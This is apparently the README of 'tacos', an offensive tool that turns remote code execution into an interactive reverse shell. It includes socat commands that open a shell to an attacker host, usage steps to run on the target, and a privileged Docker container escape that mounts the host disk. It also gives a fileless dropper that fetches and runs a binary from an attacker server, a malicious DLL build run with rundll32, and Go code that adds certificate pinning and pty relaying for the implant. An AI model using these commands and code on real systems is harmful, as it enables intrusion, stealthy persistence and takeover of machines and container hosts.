🌮 INTERACTIVE reverse shell everywhere! (Particularly digestible with socat multi-handler listener)
ariary/tacos
tacos 🌮

(reverse socat)

Spawn a pty in your reverse shell to automatically make it interactive for a socat listener.

Fast interactive reverse shell set-up 🐳 (container)

All credit goes to laluka for the idea.

Equivalent of:

socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:[PORT],verify=0
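The socat line above uses verify=0 on the target side, which disables certificate checking, so any listener that answers on that address, including one an intermediary interposes, gets the shell. The Go program below is an added example and not code from tacos or from this page: it generates an in-memory self-signed certificate for the listener (what a socat OPENSSL-LISTEN handler would load from a file), prints its SHA-256 fingerprint, and has the client skip CA and hostname verification but pin that fingerprint instead. The certificate name "tacos-listener", the loopback echo handler and the pinning scheme are assumptions for the demonstration, not tacos's behaviour.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
	"math/big"
	"strings"
	"time"
)

// selfSignedCert generates an in-memory ECDSA certificate for the listener.
// "tacos-listener" is an assumed name; nothing checks it on the client side.
func selfSignedCert() (tls.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return tls.Certificate{}, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "tacos-listener"},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return tls.Certificate{}, err
	}
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}, nil
}

// fingerprint is the hex SHA-256 of the DER leaf certificate: the value the
// attacker reads off the listener and bakes into the implant as the pin.
func fingerprint(der []byte) string {
	sum := sha256.Sum256(der)
	return hex.EncodeToString(sum[:])
}

// pinVerifier returns a VerifyPeerCertificate callback that replaces verify=0:
// no CA chain or hostname check, but the presented leaf must match the pin.
func pinVerifier(pin string) func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
	return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
		if len(rawCerts) == 0 {
			return errors.New("no peer certificate presented")
		}
		if got := fingerprint(rawCerts[0]); got != pin {
			return fmt.Errorf("certificate pin mismatch: got %s, want %s", got, pin)
		}
		return nil
	}
}

// clientConfig is the implant-side TLS config. InsecureSkipVerify turns off
// the chain/hostname checks (socat's verify=0); VerifyPeerCertificate is
// still invoked and enforces the pin, so a listener we did not set up fails
// the handshake instead of receiving the shell.
func clientConfig(pin string) *tls.Config {
	return &tls.Config{
		InsecureSkipVerify:    true,
		VerifyPeerCertificate: pinVerifier(pin),
		MinVersion:            tls.VersionTLS12,
	}
}

func main() {
	cert, err := selfSignedCert()
	if err != nil {
		panic(err)
	}
	pin := fingerprint(cert.Certificate[0])
	fmt.Println("listener fingerprint (pin):", pin)

	// Listener side, bound to loopback for the demo; a real handler would bind
	// [ATTACKER_IP]:[PORT] and hand each connection to a pty-aware relay.
	ln, err := tls.Listen("tcp", "127.0.0.1:0", &tls.Config{Certificates: []tls.Certificate{cert}})
	if err != nil {
		panic(err)
	}
	defer ln.Close()
	go func() {
		for {
			c, err := ln.Accept()
			if err != nil {
				return
			}
			go func() { defer c.Close(); io.Copy(c, c) }() // echo stands in for the shell
		}
	}()

	// Correct pin: the handshake succeeds and bytes flow.
	c, err := tls.Dial("tcp", ln.Addr().String(), clientConfig(pin))
	if err != nil {
		panic(err)
	}
	fmt.Fprint(c, "id\n")
	buf := make([]byte, 16)
	n, _ := c.Read(buf)
	fmt.Printf("echoed back: %q\n", buf[:n])
	c.Close()

	// Wrong pin: the handshake is rejected before any shell output is sent.
	_, err = tls.Dial("tcp", ln.Addr().String(), clientConfig(strings.Repeat("00", 32)))
	fmt.Println("wrong pin:", err)
}
```

The pin is checked inside the TLS handshake, so a mismatch aborts the connection before the shell writes anything; with plain verify=0 the same connection would succeed against any listener.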

Why?

  • transform RCE into an interactive reverse shell with almost no prerequisite (only curl)
  • cross-platform (Windows support is OK but not yet interactive; the non-docker solution is recommended for it)
  • tired of hitting ^C and losing your shell?
  • too lazy to copy/paste/learn the socat command
  • target doesn't have socat and you don't want to drop one there (see Alternatives below)
  • provide more advanced configuration to the tty (alias, etc.)
  • easier to obfuscate

Usage

tacos is built to work with the simple and dramatically effective project pty4all:

# On attacker machine
tmux
./light-pty4all/socat-listener.sh --lhost [ATTACKER_IP] --lport [ATTACKER_PORT] #multi-handler

# On target (transfer tacos as you wish)
./tacos [ATTACKER_IP]:[ATTACKER_PORT]       # or .\tacos.exe [ATTACKER_IP]:[ATTACKER_PORT] on Windows
# 💥
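What the target side of the procedure above does when it "spawns a pty", as an added Linux-only Go example that is not tacos's own code: allocate a pseudo-terminal from /dev/ptmx using only the standard library, start the shell in a new session with the pty as its controlling terminal (socat's pty,setsid), and relay the master end to whatever transport carries the shell. The relay helper, the TERM=xterm setting and the use of /bin/sh for the demo are assumptions; tacos may implement these steps differently.

```go
package main

import (
	"fmt"
	"io"
	"os"
	"os/exec"
	"syscall"
	"unsafe"
)

// openPTY allocates a pseudo-terminal pair from /dev/ptmx: unlock the slave
// side (TIOCSPTLCK) and ask the kernel for its index (TIOCGPTN).
func openPTY() (master, slave *os.File, err error) {
	master, err = os.OpenFile("/dev/ptmx", os.O_RDWR|syscall.O_NOCTTY, 0)
	if err != nil {
		return nil, nil, err
	}
	var unlock int32 // 0 = unlock the slave
	if _, _, e := syscall.Syscall(syscall.SYS_IOCTL, master.Fd(), syscall.TIOCSPTLCK, uintptr(unsafe.Pointer(&unlock))); e != 0 {
		master.Close()
		return nil, nil, e
	}
	var n uint32
	if _, _, e := syscall.Syscall(syscall.SYS_IOCTL, master.Fd(), syscall.TIOCGPTN, uintptr(unsafe.Pointer(&n))); e != 0 {
		master.Close()
		return nil, nil, e
	}
	slave, err = os.OpenFile(fmt.Sprintf("/dev/pts/%d", n), os.O_RDWR|syscall.O_NOCTTY, 0)
	if err != nil {
		master.Close()
		return nil, nil, err
	}
	return master, slave, nil
}

// spawnInPTY starts a command (e.g. "bash", "-il") with the slave as its
// stdin/stdout/stderr and as its controlling terminal in a fresh session.
// Because the shell owns a real tty, ^C arriving on the master becomes SIGINT
// for the shell's foreground job instead of killing the connection.
func spawnInPTY(name string, args ...string) (*os.File, *exec.Cmd, error) {
	master, slave, err := openPTY()
	if err != nil {
		return nil, nil, err
	}
	cmd := exec.Command(name, args...)
	cmd.Stdin, cmd.Stdout, cmd.Stderr = slave, slave, slave
	cmd.SysProcAttr = &syscall.SysProcAttr{Setsid: true, Setctty: true, Ctty: 0} // Ctty indexes the child's fds: 0 = stdin
	cmd.Env = append(os.Environ(), "TERM=xterm")                                  // assumed default for the demo
	if err := cmd.Start(); err != nil {
		master.Close()
		slave.Close()
		return nil, nil, err
	}
	slave.Close() // the parent keeps only the master end
	return master, cmd, nil
}

// relay wires the pty master to a transport (in tacos, the TLS connection to
// the listener) in both directions and waits for the shell to exit.
func relay(master *os.File, cmd *exec.Cmd, conn io.ReadWriter) error {
	go io.Copy(master, conn) // listener keystrokes -> shell
	go io.Copy(conn, master) // shell output -> listener
	return cmd.Wait()
}

// runAndCapture runs a one-shot command inside a pty and returns everything
// the terminal produced. Reading the master returns EIO once the shell exits.
func runAndCapture(name string, args ...string) (string, error) {
	master, cmd, err := spawnInPTY(name, args...)
	if err != nil {
		return "", err
	}
	defer master.Close()
	out, _ := io.ReadAll(master)
	_ = cmd.Wait()
	return string(out), nil
}

func main() {
	// The shell sees a tty, so tty(1) names it and stty reports a size.
	out, err := runAndCapture("/bin/sh", "-c", "tty && stty size")
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
	// For a reverse shell: master, cmd, _ := spawnInPTY("bash", "-il"); relay(master, cmd, tlsConn)
}
```

Without the pty step the shell's stdin is a socket, so `tty` reports "not a tty", programs that need a terminal (su, vim, ssh) fail, and ^C is delivered to the relay process rather than to the job in the shell.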

With docker (recommended)

Source aliases (for simplicity):

alias tacos.container='docker run --net host --rm -it ariary/tacos'

Launch multi-handler listener:

tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARGS]

Notes about tacos container security:

The alias runs the container with --net host, so from a networking point of view this is the same level of isolation as if the processes were running directly on the host and not in a container. In all other respects, such as storage, process namespace, and user namespace, the process remains isolated from the host.

🎁 Bonus: tacos reverse shell image

Useful if the target runs Docker, Kubernetes, etc.
On the attacker machine, launch your tacos listener as usual.
On the target:

docker run --privileged --rm -it ariary/tacos-reverse [TACOS_LISTENER_IP]:[TACOS_LISTENER_PORT]

💡: --privileged is not mandatory; it is only needed for the container escape below, which mounts the host's root filesystem from inside the container:

fdisk -l                     # list the host's block devices; /dev/sda1 below is an example, pick the host root partition
mkdir /mnt/hostfs
mount /dev/sda1 /mnt/hostfs

💡: If you only have write access to a manifest that deploys containers, use the ariary/tacos-reverse image with the appropriate arguments.

Install

Docker

docker pull ariary/tacos

Release

curl -sLO https://github.com/ariary/tacos/releases/latest/download/tacos && chmod +x tacos

From git

Requires Go:

git clone https://github.com/ariary/tacos.git && cd tacos
make before.build
make build.tacos          # or make build.tacos.windows

Alternatives

Alternatively, if the target does not have socat: host a statically linked socat binary, then download and execute it with the stealthy fileless-xec dropper:

# On attacker machine
# get socat static & expose it
static-get socat
python3 -m http.server 8080

# On target machine
# Use the already downloaded fileless-xec to fetch socat and launch it stealthily with the socat arguments
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:443,verify=0

Use a DLL instead of an .exe

# On attacker machine:
# modify ./cmd/tacosdll/tacosdll.go with the listener IP:PORT
$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go

# On the target:
> rundll32.exe ./tacos.dll,Tacos